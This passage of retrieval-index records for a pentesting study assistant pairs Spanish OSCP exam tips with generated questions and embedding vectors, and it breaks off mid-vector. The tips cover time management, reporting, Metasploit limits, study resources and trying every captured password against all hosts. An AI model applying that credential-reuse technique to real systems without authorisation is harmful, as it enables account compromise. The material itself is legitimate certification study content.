(anti-pΓ‘nico)\n\n```\n─ Time management ────────────────────────────────────────\n 24h β‰  24h. Duermes 6h. Comes. Te duchas.\n Regla: 1.5h sin progreso = cambia de mΓ‘quina.\n Cierra y vuelve mΓ‘s tarde con cabeza fresca.\n\n─ DocumentaciΓ³n EN VIVO ──────────────────────────────────\n Captura TODO con Flameshot/Greenshot mientras lo haces.\n No al final. Al final no recuerdas el comando exacto.\n Cada flag con hostname visible (ipconfig/ifconfig).\n local.txt = user proof, proof.txt = root proof.\n\n─ ReutilizaciΓ³n de credenciales ──────────────────────────\n La pass del usuario A muchas veces vale para usuario B.\n PRUEBA siempre cada pass que pillas contra TODOS los hosts.\n\n─ El AD set es 40 puntos seguidos ────────────────────────\n 3 mΓ‘quinas encadenadas. Si te atascas en mΓ‘quina 1,\n no avanzas en 2 y 3. Empieza por ahΓ­ con tiempo.\n\n─ Standalones independientes ─────────────────────────────\n 3 mΓ‘quinas independientes de 20pts cada una.\n user (10pt) + root (20pt). Saca user de las 3\n ANTES de obsesionarte con root de una.", "indexar": "con que puedo documentar en tiempo real las acciones de un CTF?", "v": [-0.08919, 0.05558, -0.00129, -0.02787, 0.00971, -0.07076, 0.09221, 0.15062, -0.02263, 0.0762, 0.04656, -0.09234, -0.0429, -0.08836, 0.02009, -0.01926, 0.1465, -0.09997, 0.05637, -0.07574, 0.04614, -0.17051, -0.07185, 0.00602, 0.11937, -0.05742, 0.00763, 0.00131, -0.02301, -0.0605, 0.15096, 0.04809, 0.07054, 0.02692, 0.03876, 0.00064, -0.00751, 0.05905, -0.07777, -0.00446, -0.07117, -0.01892, -0.10523, 0.14416, 0.03191, -0.00548, -0.09605, -0.12781, -0.05853, -0.06152, 0.01874, 0.01778, -0.10639, 0.04621, -0.12841, -0.13137, -0.05104, -0.14742, 0.04787, -0.13152, -0.06424, 0.07308, -0.0888, -0.01866, 0.04901, 0.03869, 0.10668, 0.04641, 0.00437, -0.0196, -0.10955, -0.02825, -0.02463, -0.02436, -0.02809, -0.05673, 0.00357, -0.09699, -0.01584, -0.01889, -0.01536, -0.00069, 0.03462, 0.03932, -0.00409, 0.0174, 0.06941, -0.08525, 0.01307, -0.09966, -0.05427, 0.16698, 0.00214, 0.0581, 0.08128, -0.00786, 0.1013, -0.05139, -0.06166, 0.00125, 0.05508, 0.05914, -0.07516, 0.03517, 0.07448, 0.10053, 0.00476, 0.01556, -0.14507, -0.00813, -0.03303, 0.04899, -0.14871, -0.06872, 0.01081, 0.06828, -0.03607, -0.14126, -0.03453, -0.01667, 0.0154, 0.00237, -0.10365, -0.09975, 0.02523, 0.0189, -0.09721, -0.05558, -0.01545, -0.02001, 0.0038, 0.08919, -0.00515, -0.11026, 0.00255, -0.08046, 0.00151, 0.00511, 0.01574, -0.0982, 0.06424, -0.00687, -0.01043, -0.00884, 0.06088, 0.02005, -0.14138, -0.0067, -0.06233, -0.01021, 0.00992, -0.04183, 0.09176, 0.04484, 0.06627, 0.03376, 0.09848, -0.00133, -0.07526, 0.02097, 0.0763, 0.03083, -0.10678, -0.14344, 0.04636, -0.02636, -0.06837, 0.04886, 0.01226, -0.03903, 0.02998, 0.00683, 0.05988, -0.03, -0.0098, -0.00398, -0.00137, -0.03301, 0.03639, -0.02537, 0.04142, 0.01992, 0.1117, 0.06541, 0.04468, -0.06408, -0.00249, 0.04865, 0.05766, 0.02527, 0.08036, 0.01307, 0.07411, 0.01853, -0.05009, -0.00808, 0.01943, -0.00978, 0.06156, -0.03041, -0.05594, -0.06653, -0.00084, 0.02708, 0.02898, 0.06079, -0.04424, 0.08336, -0.02907, 0.02287, -0.02936, 0.01507, 0.04839, -0.06718, -0.08614, 0.0169, 0.06241, 0.02575, -0.08366, 0.00699, 0.05276, 0.00267, 0.03806, -0.00154, -0.0416, -0.02903, 0.06329, 0.0061, -0.05595, -0.04796, -0.05803, 0.06244, -0.04561, 0.0134, 0.08838, 0.05861, 0.04066, -0.03605, -0.01831, -0.00921, 0.00692, 0.05978, -0.02076, 0.05679, -0.02313, -0.00699, -0.034, 0.04211, 0.00862, -0.0918, 0.0304, -0.00293, 0.06853, -0.01181, 0.03716, -0.02612]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Trampas de \"examen real\" (anti-pΓ‘nico)\n\n```\n─ Time management ────────────────────────────────────────\n 24h β‰  24h. Duermes 6h. Comes. Te duchas.\n Regla: 1.5h sin progreso = cambia de mΓ‘quina.\n Cierra y vuelve mΓ‘s tarde con cabeza fresca.\n\n─ DocumentaciΓ³n EN VIVO ──────────────────────────────────\n Captura TODO con Flameshot/Greenshot mientras lo haces.\n No al final. Al final no recuerdas el comando exacto.\n Cada flag con hostname visible (ipconfig/ifconfig).\n local.txt = user proof, proof.txt = root proof.\n\n─ ReutilizaciΓ³n de credenciales ──────────────────────────\n La pass del usuario A muchas veces vale para usuario B.\n PRUEBA siempre cada pass que pillas contra TODOS los hosts.\n\n─ El AD set es 40 puntos seguidos ────────────────────────\n 3 mΓ‘quinas encadenadas. Si te atascas en mΓ‘quina 1,\n no avanzas en 2 y 3. Empieza por ahΓ­ con tiempo.\n\n─ Standalones independientes ─────────────────────────────\n 3 mΓ‘quinas independientes de 20pts cada una.\n user (10pt) + root (20pt). Saca user de las 3\n ANTES de obsesionarte con root de una.", "indexar": "cual es una tΓ©cnica anti-pΓ‘nico para no quedarme sin ideas en los primeros puntos de un reto?", "v": [0.02513, 0.06839, -0.23451, 0.0677, 0.0434, -0.06441, 0.05807, -0.02372, -0.08432, 0.05278, 0.02605, 0.01572, 0.01572, -0.00192, 0.08564, 0.09597, -0.09618, 0.09935, 0.12021, -0.03092, -0.08924, -0.20312, -0.03176, 0.0189, 0.07064, 0.01141, 0.00779, 0.03451, -0.11565, 0.05224, 0.02547, -0.00883, 0.00619, -0.0511, -0.03258, -0.10708, 0.16274, 0.0517, 0.06168, 0.12092, -0.08052, -0.07113, -0.05772, 0.08623, 0.14424, -0.02342, 0.00864, 0.09424, 0.07152, -0.04667, -0.00104, 0.09267, -0.02053, -0.10626, -0.06268, -0.02488, 0.13493, 0.11862, -0.08405, -0.10945, -0.09106, 0.03956, 0.044, -0.02141, 0.0162, -0.05667, -0.0573, -0.1039, -0.01208, 0.02996, -0.06534, -0.02976, -0.00823, -0.14901, 0.02204, 0.06283, -0.07147, -0.01217, -0.00644, -0.03703, -0.02743, -0.04771, -0.01994, -0.03561, -0.04357, -0.1319, 0.01398, -0.06705, -0.04672, -0.12207, 0.0132, -0.00902, -0.0167, -0.001, -0.02344, 0.01391, 0.05635, 0.09647, -0.00487, 0.03237, 0.00445, -0.08414, -0.16578, 0.05942, 0.02821, 0.02671, -0.00219, -0.06388, -0.08215, 0.00054, -0.08459, 0.09412, -0.00421, -0.02133, -0.08654, -0.01424, -0.00966, -0.07739, -0.00986, -0.04573, -0.05321, 0.07788, 0.01898, -0.03591, -0.00077, 0.01376, -0.03093, -0.01, 0.0477, 0.08156, -0.02686, 0.03043, -0.10313, -0.03053, -0.02006, -0.04073, -0.00588, 0.02337, -0.02057, -0.06287, -0.03709, 0.12899, -0.05098, -0.00461, -0.03666, 0.00012, 0.02614, -0.04307, -0.11203, -0.0326, -0.08065, -0.00951, 0.047, 0.07033, -0.03227, 0.04282, 0.04977, -0.03665, 0.08763, 0.05516, 0.01856, 0.05486, 0.01305, 0.01202, -0.0581, -0.07803, -0.02385, -0.06247, 0.06583, 0.01563, -0.00158, 0.0126, -0.07572, -0.06554, 0.04303, -0.05017, -0.03237, -0.03289, 0.05031, -0.06315, -0.07967, 0.03891, -0.01659, 0.03908, 0.00452, -0.08379, -0.01368, 0.00198, 0.06713, 0.08821, -0.03685, -0.03814, -0.12786, -0.05308, -0.02936, -0.09995, 0.00846, 0.00384, 0.03024, 0.00173, -0.11953, -0.01709, -0.07426, 0.00279, 0.03801, 0.08642, -0.08389, -0.03632, 0.00604, 0.05897, 0.04765, -0.07641, 0.05184, -0.05453, -0.00575, -0.05149, 0.00182, -0.06822, -0.09983, 0.04344, 0.08653, 0.04613, -0.00242, 0.0205, -0.05182, -0.01927, 0.04672, 0.02241, 0.03178, 0.03137, -0.03944, -0.08463, 0.0165, -0.01119, 0.07313, 0.07507, 0.07673, 0.00146, -0.0157, -0.03998, 0.00967, 0.07931, -0.06192, -0.07727, -0.00975, -0.00894, -0.07899, 0.04741, -0.01802, -0.02346, -0.04503, 0.00341, 0.06172, -0.0031, 0.07498, -0.04653]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "─ Reporte cuenta ─────────────────────────────────────────\n Sin reporte, no apruebas, aunque saques 100 puntos\n tΓ©cnicos. 24h despuΓ©s del examen. Markdown template:\n https://github.com/noraj/OSCP-Exam-Report-Template-Markdown\n\n─ Metasploit limitado ────────────────────────────────────\n Puedes usarlo solo en UNA mΓ‘quina.\n meterpreter post-explotation no cuenta como \"uso\"\n solo el initial foothold cuenta.\n```\n\n---", "indexar": "que programa sirve para hacer un informe de examen OSCP", "v": [-0.15381, -0.00138, -0.11741, -0.26257, 0.10857, -0.29604, 0.03682, -0.03169, -0.13325, -0.07861, -0.05247, -0.03372, -0.00333, -0.07086, -0.00039, 0.0454, 0.09602, 0.00035, 0.0556, -0.01643, -0.03766, 0.03929, -0.05429, 0.09975, -0.02454, 0.09522, -0.09795, -0.04285, 0.03769, -0.07491, -0.02207, 0.06592, 0.03415, -0.08584, 0.02141, 0.04787, -0.02043, -0.13309, -0.03737, 0.15355, 0.01592, -0.01286, 0.01231, 0.09066, 0.11932, 0.00041, 0.05714, 0.14611, 0.04488, -0.07018, -0.04943, -0.08393, -0.00163, -0.02147, -0.0849, -0.0157, -0.06764, -0.08125, 0.0261, -0.0377, 0.0489, -0.05249, 0.00504, -0.11673, 0.10237, 0.01162, 0.04646, 0.08819, -0.05295, 0.02912, -0.02506, 0.06281, 0.0373, -0.03643, -0.13039, -0.14069, -0.06463, 0.00364, 0.08922, -0.07583, 0.04627, -0.03534, -0.0325, 0.10187, -0.10159, -0.08991, 0.02204, 0.01813, -0.01192, -0.04644, 0.02757, 0.12217, 0.04487, 0.09919, 0.13471, -0.03341, 0.1317, -0.0067, 0.02589, -0.01571, 0.08452, -0.02019, -0.02385, 0.00559, -0.13398, 0.09779, 0.10648, 0.00583, -0.02499, 0.05866, 0.011, 0.07895, -0.07521, 0.01346, -0.07435, -0.05714, 0.00696, 0.03433, 0.0043, -0.02078, -0.02869, 0.0942, -0.04195, 0.05244, 1e-05, 0.03156, 0.07281, 0.08675, 0.01335, 0.10348, 0.0628, 0.04044, -0.06986, 0.0123, -0.0815, -0.14827, -0.05236, -0.06411, 0.03831, -0.01537, 0.04592, 0.11777, 0.04073, 0.03308, 0.01078, -0.00944, -0.00235, -0.00566, 0.00288, -0.00962, 0.00365, -0.03328, -0.02359, 0.01676, -0.06193, -0.06142, 0.00576, -0.02007, -0.00756, 0.07269, -0.0305, -0.0659, -0.00991, -0.02068, 0.08671, 0.01725, -0.00537, 0.02306, 0.03956, 0.028, -0.04333, 0.01242, 0.04563, -0.1034, 0.08194, -1e-05, 0.02391, -0.00876, -0.01254, -0.00573, -0.0886, 0.03447, 0.03832, 0.04023, 0.02295, 0.02307, 0.02391, -0.0031, 0.04771, 0.01438, 0.0178, -0.00629, -0.00462, 0.00455, 0.02602, -0.00346, 0.01198, -0.04171, 0.07375, -0.04255, -0.05975, -0.02955, 0.00677, -0.0423, 0.04012, 0.06734, 0.03785, 0.05497, 0.0531, 0.08901, -0.04035, -0.02128, 0.04044, -0.0092, 0.01503, 0.01711, 0.0277, 0.10704, 0.01025, 0.02608, -0.00336, -0.02833, -0.00207, 0.06281, 0.00333, -0.02452, 0.05229, -0.01473, 0.05, 0.0069, 0.01809, -0.0414, 0.05382, -0.02074, 0.04744, -0.00498, -0.02754, 0.00476, -0.01713, -0.08176, -0.02133, 0.0331, 0.00705, -0.03342, -0.03108, 0.02848, 0.02077, -0.04477, 0.03255, -0.05042, -0.01804, -0.02654, 0.05409, 0.00895, 0.00625, 0.05771]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "─ Reporte cuenta ─────────────────────────────────────────\n Sin reporte, no apruebas, aunque saques 100 puntos\n tΓ©cnicos. 24h despuΓ©s del examen. Markdown template:\n https://github.com/noraj/OSCP-Exam-Report-Template-Markdown\n\n─ Metasploit limitado ────────────────────────────────────\n Puedes usarlo solo en UNA mΓ‘quina.\n meterpreter post-explotation no cuenta como \"uso\"\n solo el initial foothold cuenta.\n```\n\n---", "indexar": "con que puedo generar un reporte de auditorΓ­a de seguridad en formato markdown", "v": [0.10739, 0.05963, -0.09083, -0.19435, 0.04998, -0.02387, -0.03833, 0.00825, -0.04872, -0.03368, -0.12606, -0.1579, 0.03751, 0.01846, 0.01735, 0.0013, 0.07249, -0.01374, -0.05577, 0.05542, 0.14392, -0.05748, 0.01182, -0.06502, -0.01765, 0.0422, 0.04519, 0.04171, -0.02824, -0.03435, 0.05483, 0.01094, 0.09349, 0.03037, -0.14132, -0.00173, 0.11735, 0.01024, -0.01338, 0.13661, -0.05441, -0.05426, -0.03676, -0.03967, 0.16018, -0.12455, -0.01305, 0.09404, 0.01637, 0.02154, -0.02873, -0.02685, -0.13127, 0.03398, -0.02695, -0.02167, 0.04055, -0.0367, 0.13196, -0.06639, -0.14394, 0.02222, 0.04292, -0.06166, 0.02385, 0.08537, 0.10544, 0.00332, -0.00547, 0.04611, 0.06287, -0.06592, 0.01525, -0.00834, -0.05894, -0.09012, -0.06985, 0.02638, -0.09991, 0.10169, -0.0266, 0.02239, -0.06092, 0.07324, -0.15248, -0.00583, -0.09311, 0.01132, -0.10509, 0.00584, -0.01687, -0.02949, 0.04858, 0.00277, -0.08535, -0.02921, 0.10725, -0.02979, -0.14693, -0.06493, -0.04603, -0.06136, 0.03563, 0.07307, 0.11103, 0.04335, -0.00997, -0.03545, 0.06206, 0.07233, -0.03508, 0.12978, -0.11654, -0.00262, -0.06835, -0.06056, 0.0112, -0.02315, 0.04351, 0.05419, 0.04911, 0.06377, -0.05602, 0.05372, -0.06735, -0.04115, 0.04311, -0.00336, 0.04885, -0.02476, 0.1042, 0.05696, -0.05739, -0.03215, 0.01092, 0.01699, -0.10603, -0.02482, -0.06335, -0.03086, 0.02485, 0.05893, 0.12795, 0.03803, 0.00015, -0.00773, -0.07823, -0.06341, -0.16997, 0.01709, -0.01387, 0.00087, -0.14094, -0.04521, -0.03398, 0.05076, -0.0182, -0.05842, 0.04047, 0.00594, -0.02444, -0.01998, 0.06722, 0.01449, -0.00989, -0.02125, 0.06702, -0.08651, 0.07395, -0.10422, -0.0515, -0.05181, 0.06769, -0.13669, 0.03279, -0.06234, -0.06257, -0.14425, -0.00806, -0.11233, -0.01963, -0.0118, -0.03754, 0.02339, 0.00148, -0.07127, 0.06592, 0.04856, 0.05738, 0.00737, -0.01675, 0.08592, -0.00864, -0.03371, -0.00364, -0.01308, 0.01875, -0.01003, -0.00454, 0.0016, -0.05209, -0.01137, -0.01906, -0.04146, 0.07905, 0.02555, -0.03119, 0.087, 0.06263, 0.00054, 0.04777, -0.03122, -0.02137, -0.08647, -0.03733, 0.04083, 0.03261, 0.00401, -0.09042, 0.0005, -0.01196, -0.04884, 0.06224, -0.03229, -0.01732, -0.02872, 0.03068, -0.04121, -0.02242, 0.02129, -0.02455, 0.01276, -0.06642, -0.01754, 0.02267, -0.01806, -0.03429, -0.0304, 0.00929, -0.06849, 0.00329, 0.02259, 0.00686, -0.0212, -0.08133, 0.00128, -0.01903, 0.08204, 0.01918, -0.06086, 0.01826, 0.06792, 0.03904, -0.00045, -0.03091, -0.0704]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "─ Reporte cuenta ─────────────────────────────────────────\n Sin reporte, no apruebas, aunque saques 100 puntos\n tΓ©cnicos. 24h despuΓ©s del examen. Markdown template:\n https://github.com/noraj/OSCP-Exam-Report-Template-Markdown\n\n─ Metasploit limitado ────────────────────────────────────\n Puedes usarlo solo en UNA mΓ‘quina.\n meterpreter post-explotation no cuenta como \"uso\"\n solo el initial foothold cuenta.\n```\n\n---", "indexar": "hay alguna herramienta gratuita o alternativa libre para crear reportes tΓ©cnicos de pruebas", "v": [-0.01568, 0.12036, -0.20429, -0.22834, -0.02619, -0.08233, -0.06976, -0.00361, -0.08444, -0.12616, -0.10415, -0.06534, 0.04445, -0.02427, 0.14878, -0.00301, 0.08892, -0.15349, 0.09316, -0.02567, -0.06443, -0.01795, -0.14533, -0.07653, -0.0667, -0.11335, -0.0503, -0.07991, -0.10532, 0.07122, 0.04535, 0.07397, 0.05621, 0.00424, -0.09891, 0.03266, 0.13124, -0.00457, 0.09634, 0.03434, 0.02701, -0.05522, -0.00438, 0.08421, 0.06633, -0.02522, -0.04396, 0.07768, -0.03336, 0.07471, 0.02657, -0.14736, -0.05479, -0.02307, 0.02351, -0.14751, 0.16304, -0.13526, -0.06129, -0.11946, -0.05556, 0.05454, 0.03784, -0.07547, 0.01823, 0.00954, 0.02417, -0.0543, -0.07776, 0.09647, 0.06493, -0.03736, 0.07744, -0.04218, -0.12793, 0.00847, -0.06871, 0.02129, -0.04584, -0.00264, 0.0442, -0.0223, 0.03855, -0.00013, -0.10529, -0.09259, 0.0391, -0.05732, 0.04013, -0.03319, 0.04096, 0.05386, 0.04476, 0.10352, 0.0398, -0.02521, 0.13107, -0.03098, 0.01943, 0.02535, 0.09079, -0.0588, -0.02053, -0.00393, -0.04383, -0.00311, -0.00282, 0.02545, -0.06189, 0.02242, 0.02877, 0.0511, -0.01236, 0.05461, -0.06129, 0.0034, -0.01096, -0.03022, -0.04312, 0.0229, 0.05653, 0.0538, -0.08909, -0.04742, -0.0569, -0.02154, 0.06494, 0.02792, -0.03086, 0.06106, 0.09583, -0.00764, -0.1304, -0.05442, -0.08908, -0.0092, 0.05532, -0.09416, -0.03389, -0.03302, -0.06384, 0.05348, 0.00194, -0.08344, -0.0359, -0.01642, -0.03446, -0.04696, -0.02728, -0.03952, -0.02015, -0.0486, -0.06739, 0.12197, -0.11829, 0.01974, 0.00725, 0.02239, -0.09915, 0.07873, -0.02501, -0.0575, -0.03021, 0.01013, -0.01197, -0.0064, 0.05125, -0.03396, -0.01495, 0.05535, 0.00194, 0.03999, 0.07456, -0.07122, 0.07181, -0.0365, -0.01403, -0.05986, -0.02635, -0.139, 0.03621, 0.0097, -0.0818, -0.08344, 0.02409, -0.07365, 0.01707, 0.00385, 0.08484, 0.0573, -0.02781, 0.04489, -0.04067, -0.04393, 0.03844, 0.03144, 0.05679, -0.09928, -0.02062, -0.00763, -0.08259, -0.06504, -0.03317, -0.05383, -0.04722, 0.02892, 0.00083, 0.01289, 0.00924, 0.03472, 0.05688, -0.01423, 0.03299, -0.07099, -0.0321, 0.01662, 0.02081, -0.01652, -0.03879, -0.02379, 0.05447, -0.0187, 0.03059, 0.02519, -0.00601, 0.04465, 0.00872, 0.04378, 0.0011, -0.00339, 0.04493, -0.00478, 0.02199, 0.01493, 0.02243, -0.04233, 0.06388, 0.0414, 0.00464, -0.00599, -0.00498, 0.08476, 0.01824, -0.01023, -0.04521, -0.02803, -0.01187, -0.06084, -0.01834, -0.05763, -0.02711, 0.02522, 0.01951, -0.02749, 0.00806, 0.01959]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Recursos pΓΊblicos donde sΓ­ estΓ‘ todo esto\n\n| Recurso | Por quΓ© importa |\n|---|---|\n| **TJ Null's OSCP-like list** (en Reddit) | Lista actualizada de mΓ‘quinas HTB/THM equivalentes a OSCP |\n| **ippsec.rocks** | Buscador de writeups por tΓ©cnica (\"kerberoasting\" β†’ te lista todas las mΓ‘quinas HTB donde aparece) |\n| **0xdf.gitlab.io** | Writeups detalladΓ­simos con explicaciΓ³n pedagΓ³gica |\n| **PayloadsAllTheThings** | Cheatsheet de todo lo web |\n| **HackTricks (book.hacktricks.xyz)** | La biblia. Lo busques lo que busques estΓ‘ ahΓ­ |\n| **GTFOBins / LOLBAS** | Para privesc Linux y LOLBins Windows |\n| **/r/oscp** | Subreddit con experiencias de examinados (sin spoilers) |\n| **Discord pΓΊblicos**: HTB, TryHackMe, NetSecFocus | Comunidades activas que SÍ puedes consultar |\n\n---", "indexar": "quΓ© recursos online me recomiendan para aprender tΓ©cnicas especΓ­ficas de pentesting?", "v": [0.09199, 0.20704, -0.11227, -0.20091, 0.06978, -0.05724, -0.01461, -0.05179, -0.03454, -0.09204, -0.041, 0.03718, 0.03836, -0.10953, 0.10018, 0.11568, 0.02033, -0.02821, 0.20887, -0.05514, -0.06111, -0.14738, -0.15101, 0.04107, -0.08644, -0.08972, 0.07899, -0.04887, -0.01748, 0.10385, -0.05141, 0.11682, -0.03154, -0.01311, -0.12364, 0.04927, 0.04012, 0.07482, -0.07049, 0.00939, -0.08783, 0.00677, -0.13525, 0.04764, 0.07327, 0.0321, -0.06289, 0.03601, -0.03915, 0.04651, -0.06581, 0.02631, 0.0448, -0.07102, 0.00586, -0.05253, 0.05286, -0.07645, 0.02406, -0.1275, -0.0059, -0.00834, -0.07177, -0.06629, 0.02592, -0.03214, 0.08286, 0.01889, -0.1234, 0.08723, 0.01215, 0.01959, 0.11588, -0.04529, -0.06851, 0.05056, 0.08073, 0.10878, 0.13126, -0.15629, -0.07447, 0.04643, -0.03454, 0.01887, -0.029, -0.04779, -0.01442, -0.00526, 0.06708, -0.12087, -0.07618, 0.10703, -0.00722, -0.05101, -0.05284, -0.00884, 0.00832, 0.0052, 0.03127, 0.07573, -0.03402, -0.0457, -0.0091, 0.04448, -0.00332, 0.02554, -0.02589, -0.01579, -0.10317, -0.0905, -0.07203, 0.06581, -0.04218, 0.07864, 0.00258, -0.0547, 0.03985, 0.01194, -0.0625, 0.01294, -0.03222, 0.06247, 0.00104, 0.01461, 0.02912, 0.04029, 0.05036, 0.05829, 0.01897, -0.00241, 0.0264, -0.067, -0.00559, -0.09474, 0.06343, 0.00989, 0.07401, -0.00572, -0.15106, -0.09704, -0.04467, -0.02195, -0.1289, 0.00218, 0.00309, -0.02907, 0.13558, -0.11788, -0.0416, -0.06169, -0.05188, -0.06849, 0.0304, -0.00178, 0.01492, -0.02033, -0.00081, -0.0285, -0.08588, -0.00465, -0.03838, 0.06922, 0.06055, -0.06332, -0.00407, 0.02569, -0.07742, 0.08478, -0.05013, 0.00505, 0.04975, 0.05217, -0.00117, -0.01888, -0.01735, -0.05308, -0.05105, -0.00046, -0.04942, -0.02135, -0.0568, -0.06478, -0.05099, -0.03073, 0.00377, -0.0422, -0.01706, -0.05344, 0.00047, 0.07967, -0.07261, -0.05655, -0.08327, -0.03911, 0.01878, -0.03985, 0.00517, -0.02484, -0.01448, 0.00014, -0.0754, -0.00185, -0.01138, -0.07438, -0.01833, 0.03851, -0.03441, -0.07903, -0.0763, 0.01617, 0.12002, -0.06948, 0.03014, -0.07657, -0.00776, 0.02876, -0.02594, -0.02462, -0.06356, 0.0402, 0.02064, -0.00071, 0.02561, 0.04922, 0.01976, -0.00963, 0.01336, -0.02182, -0.01784, 0.05203, -0.02749, -0.0609, -0.05032, 0.00109, 0.02283, 0.0129, 0.04329, 0.0375, -0.03896, 0.03574, 0.01942, 0.04823, 0.01252, -0.03878, -0.01094, -0.02878, -0.07093, 0.01653, -0.02677, -0.03519, 0.02848, -0.05004, 0.04707, 0.03084, -0.0117, -0.00119]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Recursos pΓΊblicos donde sΓ­ estΓ‘ todo esto\n\n| Recurso | Por quΓ© importa |\n|---|---|\n| **TJ Null's OSCP-like list** (en Reddit) | Lista actualizada de mΓ‘quinas HTB/THM equivalentes a OSCP |\n| **ippsec.rocks** | Buscador de writeups por tΓ©cnica (\"kerberoasting\" β†’ te lista todas las mΓ‘quinas HTB donde aparece) |\n| **0xdf.gitlab.io** | Writeups detalladΓ­simos con explicaciΓ³n pedagΓ³gica |\n| **PayloadsAllTheThings** | Cheatsheet de todo lo web |\n| **HackTricks (book.hacktricks.xyz)** | La biblia. Lo busques lo que busques estΓ‘ ahΓ­ |\n| **GTFOBins / LOLBAS** | Para privesc Linux y LOLBins Windows |\n| **/r/oscp** | Subreddit con experiencias de examinados (sin spoilers) |\n| **Discord pΓΊblicos**: HTB, TryHackMe, NetSecFocus | Comunidades activas que SÍ puedes consultar |\n\n---", "indexar": "dΓ³nde puedo encontrar una lista actualizada de mΓ‘quinas similares a las usadas en la certificaciΓ³n OSCP?", "v": [0.14609, 0.11353, -0.06469, -0.08031, 0.01793, -0.23801, -0.0463, 0.02851, -0.15879, -0.06749, -0.13542, -0.10824, -0.03685, 0.0197, 0.00231, -0.02924, -0.01045, -0.04607, 0.02575, 0.03819, -0.05659, -0.05417, -0.14009, 0.00527, 0.04751, 0.14125, 0.05605, -0.13302, -0.27622, -0.01506, 0.13991, 0.07828, 0.02601, 0.02776, -0.04741, -0.07334, -0.0335, -0.07774, -0.03026, 0.00774, 0.02737, 0.01976, -0.00488, 0.0251, 0.11221, -0.10382, 0.05804, 0.06768, -0.04608, -0.04262, -0.16989, -0.10609, -0.11751, 0.02478, -0.03149, -0.14482, 0.03556, 0.10147, 0.09422, -0.07807, -0.10384, 0.02326, -0.07419, -0.01721, 0.00569, 0.08887, 0.03755, 0.03886, -0.05914, -0.04254, -0.03784, 0.05004, 0.01246, -0.00886, 0.01094, -0.03229, 0.08215, 0.02027, 0.13735, 0.03376, 0.01965, -0.05011, 0.00175, 0.00597, -0.0321, 0.02168, 0.04753, 0.04424, -0.01925, -0.1219, 0.00494, 0.0568, 0.03395, 0.04926, 0.09908, -0.02179, 0.04265, 0.00223, 0.03015, 0.00784, -0.01037, 0.06753, 0.01575, 0.08705, -0.08418, 0.04617, 0.06595, -0.03411, 0.06144, -0.03477, -0.00354, 0.02546, -0.07687, -0.02945, -0.0812, 0.03411, -0.04642, -0.05275, 0.03862, -0.03241, -0.0772, -0.01904, -0.01519, -0.0462, 0.06286, 0.05524, 0.00651, 0.12688, 0.01413, -0.08228, -0.02182, 0.02059, -0.08921, -0.07025, 0.00372, -0.03367, 0.00307, -0.05471, -0.0373, -0.04387, 0.01254, 0.03951, 0.03344, -0.0574, -0.00416, -0.00574, 0.01343, -0.11308, -0.04102, -0.01814, -0.05229, 0.04593, 0.07442, 0.09458, 0.00476, 0.06046, 0.02936, -0.05567, 0.01592, 0.05613, 0.00584, -0.02703, -0.09755, 0.02411, -0.00433, 0.11234, -0.00816, 0.06032, 0.03837, -0.03669, -0.00765, 0.07315, -0.01986, 0.0133, 0.02507, -0.02841, 0.03243, -0.03331, 0.02433, 0.02132, -0.0468, 0.03058, -0.04501, -0.08704, 0.05437, 0.01277, 0.06445, -0.01659, 0.04501, 0.01058, 0.05772, 0.00401, 0.00297, -0.04358, 0.01595, -0.02061, 0.03505, 0.00581, -0.00159, -0.10895, -0.1108, -0.07568, -0.10794, -0.02372, 0.0486, 0.06692, -0.00639, 0.01566, -0.05, 0.0054, 0.01083, 0.01427, 0.04779, -0.02026, -0.05966, -0.01353, 0.00377, -0.01086, -0.01704, 0.00692, 0.0117, -0.03, 0.06811, -0.00527, -0.01107, -0.06359, 0.05211, 0.02858, 0.06328, 0.07618, 0.01361, 0.10049, 0.01333, -0.08113, 0.0732, 0.06757, 0.01102, -0.04932, -0.08881, -0.07151, -0.0131, 0.05697, -0.04629, -0.05092, -0.04158, -0.01957, -0.01893, -0.05627, 0.03643, -0.04585, -0.06442, 0.01038, 0.05315, -0.06203, 0.02718, -0.01274]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Recursos pΓΊblicos donde sΓ­ estΓ‘ todo esto\n\n| Recurso | Por quΓ© importa |\n|---|---|\n| **TJ Null's OSCP-like list** (en Reddit) | Lista actualizada de mΓ‘quinas HTB/THM equivalentes a OSCP |\n| **ippsec.rocks** | Buscador de writeups por tΓ©cnica (\"kerberoasting\" β†’ te lista todas las mΓ‘quinas HTB donde aparece) |\n| **0xdf.gitlab.io** | Writeups detalladΓ­simos con explicaciΓ³n pedagΓ³gica |\n| **PayloadsAllTheThings** | Cheatsheet de todo lo web |\n| **HackTricks (book.hacktricks.xyz)** | La biblia. Lo busques lo que busques estΓ‘ ahΓ­ |\n| **GTFOBins / LOLBAS** | Para privesc Linux y LOLBins Windows |\n| **/r/oscp** | Subreddit con experiencias de examinados (sin spoilers) |\n| **Discord pΓΊblicos**: HTB, TryHackMe, NetSecFocus | Comunidades activas que SÍ puedes consultar |\n\n---", "indexar": "existe alguna comunidad o foro donde pueda consultar experiencias reales sin spoilers?", "v": [0.08058, 0.18179, -0.15761, 0.03992, 0.01527, -0.27447, 0.05324, -0.11559, -0.0266, -0.15811, -0.07444, -0.01441, 0.03376, 0.01147, 0.07276, -0.00408, 0.04754, 0.18663, 0.07374, -0.03214, -0.01527, 0.0077, -0.13975, 0.02926, 0.03864, -0.11108, 0.03296, -0.03883, 0.0586, -0.05551, 0.0979, 